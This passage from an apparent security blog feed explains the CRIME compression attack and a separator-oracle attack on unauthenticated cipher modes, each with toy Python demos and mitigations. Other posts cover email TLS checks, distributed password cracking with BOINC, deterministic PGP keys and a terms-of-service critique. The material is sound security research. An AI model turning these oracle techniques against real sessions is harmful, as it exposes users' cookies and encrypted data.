<p>CRIME works by leveraging a property of compression functions, and noting how the length of the compressed data changes.  The internals of the compression function are more sophisticated, but this simple example can show how the information leak can be exploited. Imagine the following browser POST:</p>

<pre>POST /target HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Cookie: sessionid=d8e8fca2dc0f896fd7cb4cb0031ba249

sessionid=a</pre>

<p>This data shown in binary looks like this:</p>

<img src="/resources/crime/vanilla-nomatch.png" />

<p>As mentioned, the internals of the DEFLATE compression algorithm are more sophisticated, but the basic  algorithm is to look for repeated strings, move them to a dictionary, and replace the actual strings with a reference to the entry in the dictionary.  We'll take the above example, and identify two repeated strings we can remove: ".1" and "sessionid=". We'll move them to a dictionary, and replace them with bytes not used in the message (0x00 and 0x01):</p>

<img src="/resources/crime/nomatch-comp.png" />

<p>This has compressed the message from 195 bytes to 187 bytes.  In the body of the request, we specified "sessionid=a".  Watch what happens when we specify "sessionid=d", where "d" is the first character of the secret session cookie:</p>

<img src="/resources/crime/match-comp.png" />

<p>Now we've compressed the resulting message from 195 bytes to <strong>186</strong> bytes. An attacker who can observe the size of the SSL packets can use this technique in an adaptive fashion to learn the exact value of the cookie.</p>

<p>As mentioned, the internals of the real DEFLATE have to account for a lot more than this (for example, the length of the extracted string) and work with a sliding window across the data (examining the data in chunks instead of all at once) - but this toy example shows the single-byte length difference we are looking for to reveal we've guessed the correct character.  For more sophisticated analysis you can check out <a href="http://security.stackexchange.com/questions/19911/crime-how-to-beat-the-beast-successor">Thomas Pornin's answer at stackexchange</a> and <a href="https://gist.github.com/3696912">Krzysztof Kotowicz's proof of concept code</a>.  In the coming weeks we'll also get more details from the authors that explain how they overcame other hurdles to exploitation, such as the Block Cipher Padding in AES.</p>
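<p>You can reproduce the effect with a few lines of Python and zlib (which implements DEFLATE).  The request template below is my own stand-in, but the principle is exactly the one described above: the guess that extends the longest match against the secret compresses best:</p>

```python
import zlib

SECRET = "sessionid=d8e8fca2dc0f896fd7cb4cb0031ba249"

def compressed_len(guess: str) -> int:
    # The cookie header (secret) and the attacker-controlled body
    # are compressed together, as in the toy POST above.
    request = ("POST /target HTTP/1.1\r\n"
               "Host: example.com\r\n"
               f"Cookie: {SECRET}\r\n"
               "\r\n"
               f"sessionid={guess}")
    return len(zlib.compress(request.encode(), 9))

# Try every candidate for the first character of the cookie value.
lengths = {c: compressed_len(c) for c in "0123456789abcdef"}
```

<p>The correct character ("d") yields the smallest compressed size; repeating the process with "d" fixed recovers the cookie one character at a time.</p>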

<!-- =============================================================================================== -->
<h3>Exploitation Scenarios</h3>

<p>In our toy example above we placed our guess for the cookie in a POST body.  Initially, speculation was that to exploit CRIME you would require the ability to run JavaScript inside the target domain - such as through a Cross-Site Scripting Attack.  Since then, a number of novel techniques have been discussed, including:</p>

<ul>
<li>Cross Domain requests
<li>moving the payload to the querystring in a GET request
<li>using &lt;img&gt; tags (a method used by Rizzo/Duong)
</ul>

<p>It's clear that there are an uncountable number of ways to exploit the vulnerability if it is present.  Rather than trying to block individual avenues to exploitation - which is likely impossible - we recommend you mitigate the issue at the source by disabling SSL Compression (and SPDY Compression if used.)</p>

<!-- =============================================================================================== -->
<h2>Mitigation</h2>

<p>Disabling compression is the agreed-upon approach to mitigating the vulnerability.  Very few clients support SSL or SPDY Compression, and the major ones that do (Chrome and Firefox) have patched it.  Disabling SSL Compression is different from disabling HTTP Compression - and will almost always have no adverse effects (especially because many clients already do not support it).  If HTTP Compression is enabled, SSL Compression will only compress HTTP Requests and Response Headers - a small percentage of the traffic compared to the body of web application pages.</p>

<p>At this point, the latest versions of all browsers will not offer Compression in SSL. The following versions were explicitly tested.</p>

<ul>
<li>All versions of Internet Explorer (No Versions of IE support SSL Compression)
<li>Google Chrome 21.0.1180.89
<li>Firefox 15.0.1
<li>Opera 12.01
<li>Safari 5.1.7 on Windows
<li>Safari 5.1.6 &amp; 6 on OSX Lion
</ul>

<!-- =============================================================================================== -->
<h3>Server-Side Mitigation</h3>

<p>In most cases you can rely on clients having been patched to disable compression. If you want to perform due diligence you can disable SSL Compression server-side also. You can test for SSL Compression using the <a href="https://www.ssllabs.com/">SSL Labs</a> service (look for "Compression" in the Miscellaneous section) or using iSEC Partners' <a href="https://github.com/iSECPartners/sslyze/downloads">ssl scanning tool SSLyze v0.5</a>.</p>

<p>If you have Compression enabled, the method of disabling it varies depending on the software you're running.  If you're using a hardware device or software not listed here, you'll need to check the manual or support options and note that you want to disable <em>SSL Compression</em> - it shouldn't be confused with HTTP Compression.</p>

<h4>Apache 2.4 using mod_ssl</h4>

<p>Apache 2.4.3 has support for the SSLCompression flag.  This is a very new release of Apache - the feature itself was added <a href="http://svn.apache.org/viewvc?view=revision&amp;revision=1369585">in August, 2012</a>.  SSLCompression is <strong>on by default</strong> - to disable it specify "<a href="http://httpd.apache.org/docs/2.4/mod/mod_ssl.html#sslcompression">SSLCompression off</a>".</p>

<h4>Apache 2.2 using mod_ssl</h4>

<p>The patch will be backported from Apache 2.4 to Apache 2.2 in 2.2.24 according to <a href="https://issues.apache.org/bugzilla/show_bug.cgi?id=53219">the corresponding issue for mod_ssl</a>.</p>

<h4>Apache using mod_gnutls</h4>

<p>If you are using mod_gnutls you can specify the <a href="http://modgnutls.sourceforge.net/downloads/docs/mod_gnutls_manual-0.1.html">GnuTLSPriorities</a> flag to disable compression.  Specify "!COMP-DEFLATE" to disable compression.</p>

<h4>IIS</h4>

<p>Microsoft IIS does not support SSL Compression - even in IIS 7.5/Server 2008 R2.</p>

<h4>Amazon Elastic Load Balancers</h4>

<p>iSEC Partners has confirmed with Amazon that Elastic Load Balancers do not support TLS Compression.</p>

<!-- =============================================================================================== -->
<h2>Acknowledgements</h2>

<p>Thanks to a few folks for their help in preparing this post: Alex Garbutt, Doug DePerry, Rafael Turner, Rachel Engel, and the team at Second Market.</p>

<p><em>This post originally appeared on <a href="https://isecpartners.com/news-events/news/2012/september/details-on-the-crime-attack.aspx">iSEC Partners' blog</a>.</em></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-couchsurfing_tos_update.html</guid>
		<title>On Couchsurfing's New Terms of Service</title>
		<pubDate>2 Sep 2012 00:43:34 EST</pubDate>
		<description><![CDATA[
<div style="text-align:center"><strong>Scroll Down for an Update</strong></div>

<p>Recently Couchsurfing sent out an email about their <a href="http://www.couchsurfing.org/new_terms.html" class="themainlink">new terms of service</a>.  I took a look, and was pretty surprised - even in the world of ridiculous Terms of Service, this one seemed over the top.  I fired off a quick ranty message through the only feedback system I could find, tweeted about it, and planned on deleting my account a short while later.  However, they replied back to me politely and generically, and I realized I needed to send a more structured response. Below are the four major things that jumped out at me in the new Couchsurfing Terms of Service, compared to several other major sites' terms. If you likewise think the terms aren't well thought out, I'd encourage you to drop them a polite email as well.  The email chain I'm responding to is at the very bottom of the post.</p>

<hr style="width:50%" />
<div style="text-align:center">My second email to them</div>

<p>I understand your lawyers want you to cover your ass - and of course there needs to be some permission licensing the content.  I'm not uninitiated to the process - so I'm not complaining in the general "you can't do this, this is crazy" stance - I'm complaining in the specific "Even in the world of overly broad Terms of Service - yours is Super-Overly-Broad".  I'm not a lawyer but I am interested in this stuff, and from my research here's what I've come up with.</p>

<p>Several of the things I take issue with: <ol>
<li>There is no regard to member ownership of content, beyond stating that the member must own the content they upload.
<li>There is no regard to the privacy settings of Couchsurfing Profiles, nor deletion of member content
<li>There is overbroad permission for your use of the content
<li>There is really strange language relating to granting you permission to use my Identity.
</ol></p>

<p>I'll reference several other Terms of Services for similar websites, linked at the end.</p>

<p>Regarding #1: Facebook's, yFrog/ImageShack's, Yahoo/Flickr's, and MySpace's terms explicitly state that they do not claim ownership of any content, while yours do not.</p>

<p>Regarding #2: Facebook takes the same "non-exclusive, transferable, sub-licensable, royalty-free, worldwide license to use any IP content" clause - but they explicitly state that this is subject to the user's Privacy Settings _and_ that the license ends "when you delete your IP content or your account".  MySpace's likewise mentions Privacy settings: "except that Content marked 'private' will not be distributed by Myspace outside the Myspace Services and Linked Services" and "After you remove your Content from the Myspace Services we will cease distribution as soon as practicable, and at such time when distribution ceases, the license will terminate."  Flickr too: "This license exists only for as long as you elect to continue to include such Content on the Yahoo! Services and will terminate at the time you remove or Yahoo! removes such Content from the Yahoo! Services."  And yFrog/ImageShack "You may revoke this permission at any time by requesting your content to be removed."</p>

<p>Regarding #3: The clause "for any purpose" is overbroad.  If you wanted to sell people's personal photos for use as stock photography you would be able to.  Contrast that with yfrog's "will not sell or distribute your content to third parties or affiliates without your permission" or Yahoo/Flickr's "the license to use, distribute, reproduce, modify, adapt, publicly perform and publicly display such Content <em>on the Yahoo! Services</em> solely for the purpose for which such Content was submitted or made available".  Myspace's does not take the ability to sell or distribute outside of their site: "This limited license does not grant Myspace the right to sell or otherwise distribute your Content outside of the Myspace Services or Linked Services."</p>

<p>Regarding #4: "without limitation the right to use your name, likeness, voice or identity" You're claiming the right to use my <em>identity</em>?!  That's really, really strange, and probably interfaces weirdly with some Identity Theft law somewhere in the US.  </p>

<p>Thanks for taking the time to respond to me, and I hope you will take these concerns under consideration.  </p>

<br />[0] <a href="http://www.facebook.com/legal/terms">http://www.facebook.com/legal/terms</a>
<br />[1] <a href="http://www.myspace.com/Help/Terms?pm_cmp=ed_footer">http://www.myspace.com/Help/Terms?pm_cmp=ed_footer</a>
<br />[2] <a href="http://yfrog.com/page/tos">http://yfrog.com/page/tos</a>
<br />[3] <a href="http://info.yahoo.com/legal/us/yahoo/utos/utos-173.html">http://info.yahoo.com/legal/us/yahoo/utos/utos-173.html</a>

<hr style="width:25%" />
<div style="text-align:center">Their reply to my first email</div>

<p>Hello Tom</p>

<p>Thank you for writing in to us about the recent changes to our Terms of Use and Privacy Policy. The reason for these changes are to keep up with legal developments here in the United States, as well as to make sure that our policies cover all of the new features that we are planning to introduce to the CouchSurfing community.</p>

<p>In order to display your content on CouchSurfing, such as your profile picture or group posts, we need your permission to do so. When you upload content to CouchSurfing (like photos or group posts) you grant us the right to use it in various ways, such as linking to it and displaying it to other members. </p>

<p>When you send us a Submission such as a photo or a story, we might choose to write a blog post about it or post it to our Facebook, Twitter or other social media pages. If you send us a CouchSurfing design, we may make it into a product on the CS Shop. Please don't send us anything that you would prefer to keep private.</p>

<p>Hopefully this answers your question, but if not feel free to email us back at policies@couchsurfing.com.</p>

<p>Happy Surfing!</p>

<hr style="width: 50%" />
<div style="text-align:center"><p><strong style="color:red">Update:</strong> I heard back from them over the weekend, and with their permission can post their response. <br />Their reply to my second email.</p></div>

<p>Hi Tom,</p>

<p>I'm sorry for the slow response. Hopefully I can address some of your concerns below, and I can certainly understand how the language in section 5.3 sounds over-broad. My responses are specific to your itemized questions.</p>

<p>1)   You're right, we don't mention this specifically, although it is true that members do continue to own their own content (with the exception of things submitted directly to us as a Submission under Section 6.0). We originally included plain-english annotations with this new version of our Terms of Use which stated that explicitly, but our concern was that members would make decisions based on the annotations, which, being a summary, would have the potential to mislead them by not including the full information. In such a case, we might be considered liable for distributing bad information. My hope for CouchSurfing is that we can eventually move to completely plain-english policies.</p>

<p>2) Privacy settings are evolving on CouchSurfing. We are working on a complete overhaul to the website, which will include a lot of new features, and new privacy settings will go hand in hand with that. But because we don't know what exactly those new features or privacy settings will be, it is hard to reference them specifically.</p>

<p>3) The license under Section 5.3 gives us the ability to do things like display your name, pictures and other content on the website and through other CouchSurfing products as we develop them. However, it does not give us the ability to do whatever we want with your personal information. We cannot do anything with your information that is not clearly explained in our Privacy Policy. I would encourage you to take a look through that Policy here: http://couchsurfing.com/new_privacy and let me know if you have any further questions. Member privacy is very important to us.</p>

<p>4) This language is broad to allow us to develop new CouchSurfing products and features without having to rewrite the TOU at every turn. But please see above about how our Privacy Policy details exactly how and when we collect, use and share your information.</p>

<p>Hopefully this helps answer your questions, and thank you again for writing in. We truly do appreciate member feedback, and will take you suggestions into account as we continue to improve CouchSurfing. </p>

<p>Kind regards,</p>

<p>Cameron<br />
Legal Counsel<br />
CouchSurfing International, Inc.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-separator_oracle.html</guid>
		<title>An Attack on Unauthenticated Block Cipher Modes - Separator Oracle</title>
		<pubDate>25 May 2012 12:24:34 EST</pubDate>
		<description><![CDATA[
<p><a href="https://twitter.com/jonpasski">Jon Passki</a> came to me a couple months ago with an idea for a new adaptive ciphertext attack on block cipher modes - similar to the Padding Oracle or <a href="/blog-mangers_oracle.html">Manger's Oracle</a> attacks.  I found some ways to extend it, and we wound up collaborating on it - and we're finally able to publish it today.</p>

<p>Certain block cipher confidentiality modes, including CBC, CTR, CFB, and OFB, perform decryption with a final step that XORs with ciphertext - which is often attacker-controlled.  When an application decrypts altered ciphertext and attempts to process the manipulated plaintext, it may disclose information about intermediate values, resulting in an oracle.  The information disclosed may vary - it could be improper ASN.1 decoding, an invalid timestamp, or what we focus on: invalid delimited values.</p>

<p>We use the common application pattern of encrypting delimited values, such as "username|timestamp|userlevel", and the common practice of raising an exception if the number of delimited values is not what's expected.  Application code could look like:</p>

<pre>
    ciphertext = read_from_cookie("sessionid")
    plaintext = decrypt(ciphertext)
    values = plaintext.split("|")
    if len(values) != 3:
        raise Exception("Incorrectly structured values")
    # Continue on processing data</pre>
        
<p>By detecting this exception, which we call a SeparatorException, we are able to mount an adaptive ciphertext attack that allows us to decrypt the ciphertext.  Additionally, after learning the plaintext, we can control the decryption to result in an arbitrary plaintext of our choosing.  The solution of course is to verify the integrity of the ciphertext using either a Message Authentication Code (MAC) or an Authenticated Encryption Mode.  Matt Green has a good blog post about <a href="http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html">how to choose an Authenticated Encryption mode</a>.  </p>
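<p>The malleability these modes share is easy to see with a toy stream cipher - a sketch where an illustrative hash-chain keystream stands in for CTR mode, and the key, cookie value, and byte position are all made up:</p>

```python
import hashlib

def keystream(key, length):
    """Toy hash-chain keystream - a stand-in for AES-CTR, NOT a real cipher."""
    out, block = b"", key
    while len(out) < length:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:length]

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

key = b"server-side secret"
plaintext = b"alice|1338508800|user"
ciphertext = xor(plaintext, keystream(key, len(plaintext)))

# The attacker flips a single ciphertext bit; the corresponding plaintext
# bit flips too.  Hitting the first '|' destroys a separator, so the
# three-field check above raises a SeparatorException - that's the oracle.
tampered = bytearray(ciphertext)
tampered[5] ^= 0x01                    # byte 5 of the plaintext is '|'
mangled = xor(bytes(tampered), keystream(key, len(plaintext)))
assert len(mangled.split(b"|")) == 2   # one separator gone -> exception path
```

<p>By trying each byte position and watching which flips trigger the exception, the attacker maps out where the separators sit - the starting point for the full adaptive attack described in the paper.</p>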

<p>The paper is <a class="themainlink" href="/resources/IxorCAttack.pdf">available in a pdf</a>, and code that demonstrates the attack on several block cipher modes is included at <a class="themainlink" href="https://github.com/tomrittervg/separator-oracle">https://github.com/tomrittervg/separator-oracle</a>.</p>

<p><em>The paper was updated June 3rd.  Thanks to Juraj Somorovsky for pointing out some additional work on the subject.</em></p>

<p><em>This post originally appeared on <a href="http://www.isecpartners.com/blog/2012/5/25/tom-ritters-adaptive-ciphertext-attack-whitepaper-released.html">iSEC Partners</a> and <a href="https://www.aspectsecurity.com/blog/separator-oracle-2/">Aspect Security</a></em></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-no_email_security.html</guid>
		<title>On the Sorry State of E-Mail Security</title>
		<pubDate>20 May 2012 23:34 EST</pubDate>
		<description><![CDATA[
<p>Something I've been interested in for the past few months is SSL/TLS, and in particular looking at undetectable attacks.  </p>

<p>Censorship is detectable.  You know you're being censored.  Censorship always implies passive network tapping - the entity <em>has</em> to perform the tap to do the censorship.  And censorship itself is an active attack - the entity blocks you from visiting the website.  </p>

<p>But passive attacks are usually undetectable from the user's perspective.  If a network is being tapped - either a corporate network, or the national backbone - you usually have no way of learning this.  We have <a href="https://en.wikipedia.org/wiki/Room_641A">a</a> <a href="http://www.wired.com/science/discoveries/news/2006/05/70908">pretty</a> <a href="http://www.alternet.org/rights/155084/whistleblower%3A_the_nsa_is_lying_--_the_u.s._government_has_copies_of_most_of_your_emails/?page=entire">good</a> <a href="http://www.democracynow.org/2012/4/20/whistleblower_the_nsa_is_lying_us">idea</a> that the NSA is tapping large swaths of the Internet, but because it's just whistleblowers it's not considered credible proof. The <a href="http://en.wikipedia.org/wiki/FRA_law">Swedish version</a> however is well documented. </p> 

<p>But active attacks aren't always detectable either.  If Chrome didn't have cert pinning, who knows how long the <a href="http://en.wikipedia.org/wiki/DigiNotar">DigiNotar</a> compromise would have gone undetected.  If a CA is compromised, we won't be able to detect an attack.  Bugs can bypass certificate validity checking too - it's a dangerous class of client bug that allows undetectable MITM, but <a href="http://blog.thoughtcrime.org/sslsniff-anniversary-edition">we've seen them</a>.  And if a client isn't checking the validity of a certificate at all, an attacker doesn't need a bug or CA compromise - they can just perform a MITM with a self-signed certificate.</p>

<p>When we think of "SSL clients" we think of web browsers.  <em>Sometimes</em> email uses SSL too.  Not always.  When it doesn't, it's obviously easy to tap and read.  But when it does, it's not much better.</p>

<p>Your individual client - Outlook or Thunderbird - will require a valid certificate <em>if</em> it's configured to use SSL.  But there's more to it than that.  Without going into too much detail, Outlook is a Mail User Agent (MUA), and it talks to a Mail Transfer Agent (MTA). When you send an email, your MUA transfers it to an MTA, and the MTA transfers it to another MTA.  That MTA-to-MTA transfer is <em>rarely</em> protected by SSL.  When it <em>is</em> protected, it rarely has a valid certificate.  And even when it <em>does</em> have a valid certificate, an MTA almost never requires a valid certificate from its peer.</p>

<p>The end result of this is that our entire email infrastructure is vulnerable to passive eavesdropping and undetectable active attacks.  We have <a href="http://www.imc.org/ietf-smtp/mail-archive/msg05366.html">statistics</a>.  And we have examples.  You can use the very awesome <a href="http://www.checktls.com/index.html" class="themainlink">CheckTLS.com</a> to run some tests on different mail servers. I ran a few tests myself:</p>

<ul>
<li>Valid SSL Certificate
 <ul>
 <li>Paypal</li>
 <li>Wells Fargo</li>
 <li>Bank of America</li>
 <li>PNC Bank</li>
 <li>StartSSL</li>
 <li>GeoTrust</li>
 <li>Thawte</li>
 <li>Visa</li>
 <li>VMWare</li>
 </ul>
</li>
<li>Has Invalid SSL Certificate
 <ul>
 <li>Google/Gmail, including Twitter and Github</li>
 <li>Google Voice e.g. txt.voice.google.com</li>
 <li>Youtube - bad wildcard</li>
 <li>J.P. Morgan Chase</li>
 <li>Citibank</li>
 <li>ING Direct</li>
 <li>Amazon</li>
 <li>Tor Project (self-signed)</li>
 <li>EFF (For a strange reason..)</li>
 <li>Comodo (For a strange reason..)</li>
 <li>Digicert (For a strange reason..)</li>
 </ul>
</li>
<li>Has <em>no</em> SSL Certificate
 <ul>
 <li>Hotmail</li>
 <li>Yahoo</li>
 <li>Facebook</li>
 <li>Mail.com</li>
 <li>Live</li>
 <li>Mint.com</li>
 <li>Discover Card</li>
 <li>Entrust</li>
 </ul>
</li>
</ul>
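<p>Tests like these can be scripted with nothing but the Python standard library. The sketch below is a crude stand-in for CheckTLS, not its actual method - the classification strings are mine, a strict default <code>ssl</code> context plays the role of "requiring a valid certificate", and note that outbound port 25 is often blocked on residential connections:</p>

```python
import smtplib
import ssl

def check_starttls(mx_host, port=25, timeout=10):
    """Classify a mail server the way the lists above do: no SSL,
    invalid certificate, or valid certificate."""
    try:
        server = smtplib.SMTP(mx_host, port, timeout=timeout)
    except (OSError, smtplib.SMTPException):
        return "unreachable"
    try:
        server.ehlo()
        if not server.has_extn("starttls"):
            return "no SSL"
        # A default context verifies the chain AND the hostname -
        # i.e. it behaves like the strict client that MTAs almost never are.
        try:
            server.starttls(context=ssl.create_default_context())
            return "valid certificate"
        except ssl.SSLError:
            return "invalid certificate"
    except smtplib.SMTPException:
        return "protocol error"
    finally:
        try:
            server.quit()
        except (OSError, smtplib.SMTPException):
            pass
```

<p>Point it at a domain's MX host (e.g. the output of a <code>dig MX</code> lookup) to reproduce the kind of results above for yourself.</p>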

<p>There's no ubiquitous e-mail encryption (S/MIME or PGP), there's no requirement for a valid SSL certificate (for what it's worth), and there's no requirement for SSL at all.  And there's no global plan for fixing it either.  Yet.  </p>

<p>Footnotes:</p>

<p><a href="http://ooni.nu/">OONI</a>, or the Open Observatory of Network Interference, was introduced at RECon 2011 <a href="http://archive.org/details/recon_2011_internet_filtering">(video of talk)</a> and is a tool to detect surveillance and censorship in the world.</p>

<p>Even though Outlook and Thunderbird will require a valid CA-signed certificate if they're configured to use SSL, there's no Cert Patrol or Convergence for a mail client, so you'd never detect a CA compromise.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-blackhateu_tls.html</guid>
		<title>Black Hat EU Presentation: The IETF &amp; The Future of Security Protocols</title>
		<pubDate>14 Mar 2012 04:05 EST</pubDate>
		<description><![CDATA[
<p>Just two weeks (to the day) after presenting <a href="https://github.com/tomrittervg/cloud-and-control">Cloud &amp; Control</a> at RSA in San Francisco, I was in Amsterdam presenting at Black Hat EU.  I've been getting more involved with the tremendous number of standards bodies, keeping track in my own head of what improvements are coming down the pipe - so I decided it'd be worthwhile to write that down in a talk (and whitepaper). The talk only brushes over the topics I thought would be most interesting to present - the whitepaper and slides contain far more.</p>

<p>According to my filters, I'm on over 50 mailing lists, and keeping track of everything is a pain - so I did it for you.  The whitepaper, <a href="http://ritter.vg/p/2012-TLS-Survey.pdf" class="themainlink">available here</a>, covers a lot of ground: improvements in and coming soon to browsers, like Content Security Policy, Caja, Strict Transport Security, and Key Pinning; achieving authenticity through DNSSEC; and huge sections on TLS and PKI.  I go into detail on TLS 1.1 and 1.2 - implementation issues, deployment, and why we'll never actually get the security of the protocols until we remove backwards compatibility - as well as upcoming TLS changes like False Start and Next Protocol Negotiation.  I cover a couple of larger TLS topics like Channel Binding and Secure Remote Password, and a lot of smaller ones like Datagram TLS and Encrypted Client Certificates.  Finally, I survey all the proposed fixes or replacements for the Certificate Authority system, from the very popularized, like Convergence, to the very obscure, like YURLs.  I pull out the core concepts from the proposals to come up with a list of properties that can be used to evaluate them all and see where each falls short.</p>

<p>I put way more effort into the whitepaper than I think Black Hat expected, but once I started working on it I wanted it to be complete.  It's likely to see further changes - the current version, dated March 15, 2012, is the first revision, containing a typo fix and a minor correction relating to RFC 5705, thanks to Adam Langley.</p>

<p><strong>Update:</strong> The <a href="https://media.blackhat.com/bh-eu-12/videos/bh-eu-12-Ritter-Future-of-Security-Protocols.mp4" class="themainlink">video has been posted</a> by Black Hat.  160MB MP4.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-a_letter_the_the_calyx_institute.html</guid>
		<title>An Open Letter to The Calyx Institute</title>
		<pubDate>29 Oct 2011 15:36 EST</pubDate>
		<description><![CDATA[
<p><a href="http://www.calyxinstitute.org/">Calyx Institute</a>, Nick, et al</p>

<p>I can't express how impressed and inspired I was by Nick's prolonged legal battle.  His willingness to stay the course, challenge the system meaningfully, and effect change is an inspiration to anyone who considers themselves a free speech advocate.</p>

<p>I want to make The Calyx Institute aware of a severe deficiency online, and hope to inspire you to do what you can about it.  There are a number of individuals, nonprofits, and organizations that have run free-speech programs and services for years.  But this has always been done ad hoc, often resulting in problems and headaches.  Services like Tor and remailers do generate legitimate abuse complaints.  But these complaints are often automated, and ultimately do not hold up against the safe harbor provisions afforded a common carrier.</p>

<p>But that doesn't mean that Tor operators aren't forced to bounce hosting providers often.  There doesn't seem to be any meaningful way for people to host these services without worrying at night about whether it will be there in the morning [1].  I won't confess to completely understanding the landscape of ISPs, ARIN, peering, and abuse contacts - but I do know there seems to be no way as an individual or even non-profit to find a reasonably priced host that supports free speech.  I'm not looking for a host that turns a blind eye towards illegal activity, just one that understands that abuse notifications sent to a common carrier often have no teeth, and will pass them along to be dealt with by the individuals running the services.</p>

<p>I think the Calyx Institute, having been founded by someone who <em>does</em> understand the landscape, is uniquely situated in this area.  It's not so much a matter of providing advice, as for years we've all talked to hosting providers until we're blue in the face - and still we got dropped by our providers.  I hope Calyx Institute can grow to actually provide or partner with someone to provide the service, uplink, IP addresses, or whatever is needed to let individuals and organizations host our legal free-speech services.  And give us the peace of mind to fight our own battles against corporations and the government - without also fighting our hosting provider.</p>

<p>-tom</p>

<p>Cosignatures:</p>
<ul>
<li><a href="https://www.torservers.net/">https://www.torservers.net</a></li>
<li><a href="https://crypto.is/">https://crypto.is/</a></li>
</ul>

<p>[1] You can browse the torservers mailing list archives for some insight into the problems. <a href="http://www.freelists.org/archive/torservers/">http://www.freelists.org/archive/torservers/</a></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-ekoparty_boinc.html</guid>
		<title>Ekoparty Presentation: Cloud &amp; Control</title>
		<pubDate>27 Sep 2011 23:05 EST</pubDate>
		<description><![CDATA[
<p>I gave my first presentation at a security conference on Friday, presenting at <a href="http://ekoparty.org">ekoparty</a> on some work I did at the beginning of the year on distributing complex tasks to hundreds or thousands of computers. <a href="http://en.wikipedia.org/wiki/SETI@home">SETI@Home</a> was the project that pioneered the idea of distributed volunteer computing, and their command &amp; control software evolved into a generic project called <a href="http://en.wikipedia.org/wiki/Berkeley_Open_Infrastructure_for_Network_Computing">BOINC</a>. You can run just about any application in BOINC - whether it's open or closed source, uses GPUs or the network, or even if it's not CPU intensive (like nmapping the internet).</p>

<p>Setting up a server isn't the most exciting topic to talk about, so I used two examples to illustrate BOINC in my presentation: factoring RSA512 to recover the private key to SSL certificates or PGP keys and cracking passwords.  Factoring was a huge success, but cracking didn't work out that well.  BOINC was able to distribute the work and crack things really quickly - by splitting up wordlists automatically based on hash functions I was able to scale out to more machines than I think most people are able to... but the problem came from never actually looking at the output.  The best crackers, especially in cracking contests, find patterns in the cracked passwords to make mangling rules and masks and crack more passwords.  You could still use BOINC as a work distributor to scale out, but you need to be behind the wheel making work units - not use it as a fire-and-forget system.</p>
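<p>The splitting itself is the simple part. A minimal sketch - a hypothetical helper, not taken from the released scripts - of cutting a wordlist into per-workunit chunks:</p>

```python
def split_wordlist(words, n_units):
    """Cut a wordlist into n_units roughly equal chunks, one per workunit.
    The remainder is spread over the first few chunks."""
    size, rem = divmod(len(words), n_units)
    chunks, start = [], 0
    for i in range(n_units):
        end = start + size + (1 if i < rem else 0)
        chunks.append(words[start:end])
        start = end
    return chunks

# e.g. ten words across three workers:
# split_wordlist(list(range(10)), 3) -> [[0, 1, 2, 3], [4, 5, 6], [7, 8, 9]]
```

<p>The hard part, as noted above, is what a fire-and-forget splitter can't do: look at the cracked output and feed mangling rules and masks back into the next round of workunits.</p>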

<p>Getting applications running in BOINC is a bit of trial and error.  If it's an open source application, you have to patch it a little bit; if it's closed source, you have to write a job.xml file defining how to run the application.  In either case you have to define input and output templates that let BOINC know what files to send with the workunit and what files to expect the program to produce.  And since I was sending a couple hundred MB of wordlists and resource files, I wanted to compress them and decompress them on the client, which added a little bit of work too.  To try and make it easier on you, I've released all the scripts, templates, config files, and patches I created while working with BOINC.  I've also not just released my slides, but annotated them with links to the reference material for everything mentioned.  Everything is up on <a href="http://github.com/GDSSecurity/cloud-and-control">github</a>.</p>

<p>I've wanted to factor large numbers for a while, and this was actually what got me into this whole mess.  I have some (simple) observations about <a href="https://github.com/GDSSecurity/cloud-and-control/tree/master/gnfs-info">factoring using the General Number Field Sieve</a>, as well as instructions for how to do it yourself (with or without BOINC).</p>

<p>I have to thank Leonardo and all the ekoparty organizers for putting on a great conference.  They went out of their way to make the international attendees as comfortable as possible, and even had simultaneous translation from English to Spanish <em>and</em> from Spanish to English.  Buenos Aires is a wonderful city, and I really recommend you visit!</p>

<p>This writeup originally appeared on the <a href="http://blog.gdssecurity.com/labs/2011/9/26/ekoparty-presentation-cloud-control.html">Gotham Digital Science blog</a>.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-non_persistent_pgp.html</guid>
		<title>Non-Persistent PGP Keys</title>
		<pubDate>3 Aug 2011 16:09:36 PST</pubDate>
		<description><![CDATA[
<p>I just got out of Dan Kaminsky's talk at Black Hat, where he talked about a myriad of topics - but the one I want to focus on is his tool Phidelius.  It's a library you load with LD_PRELOAD that hooks /dev/random, /dev/urandom, and some other functions to de-randomize the random data that key generators like gnupg, openssl, or ssh-keygen use.</p>

<p>Why would you want to do that?  Well, instead of using a random stream of bytes, it uses a reproducible stream of bytes derived from a password/passphrase.  The bytes could come from any key derivation function, but both Dan and I chose scrypt, by Colin Percival.</p>
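<p>A minimal sketch of the idea in stdlib Python - the scrypt parameters and the hash-counter expander here are my assumptions for illustration, not the construction Phidelius or my tool actually uses:</p>

```python
import hashlib

def deterministic_bytes(passphrase, salt, nbytes):
    """Expand a passphrase into a reproducible 'random' byte stream:
    scrypt derives a seed, then a SHA-256 counter chain stretches it."""
    seed = hashlib.scrypt(passphrase.encode(), salt=salt,
                          n=2**14, r=8, p=1, dklen=64)
    out, counter = b"", 0
    while len(out) < nbytes:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:nbytes]

# Same inputs, same "randomness" - and therefore the same key material.
assert deterministic_bytes("hunter2", b"salt", 32) == \
       deterministic_bytes("hunter2", b"salt", 32)
```

<p>Feed a stream like this to a key generator in place of /dev/urandom and the "generated" key is a pure function of the passphrase.</p>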

<p>His tool is considerably more robust than mine and works with many different programs without modification - mine specifically generates OpenPGP keys.  And as he noted in his talk - while you <em>can</em> do this - that doesn't mean it's a good idea.  </p>

<p>The idea has probably been public for some time now, although I couldn't find an example of it - and since Dan has shouted it out, I figured now's the time to release my code and let people play with it while they're interested. Anyway, there are a ton of caveats, some of which I'll list:</p>

<ul>
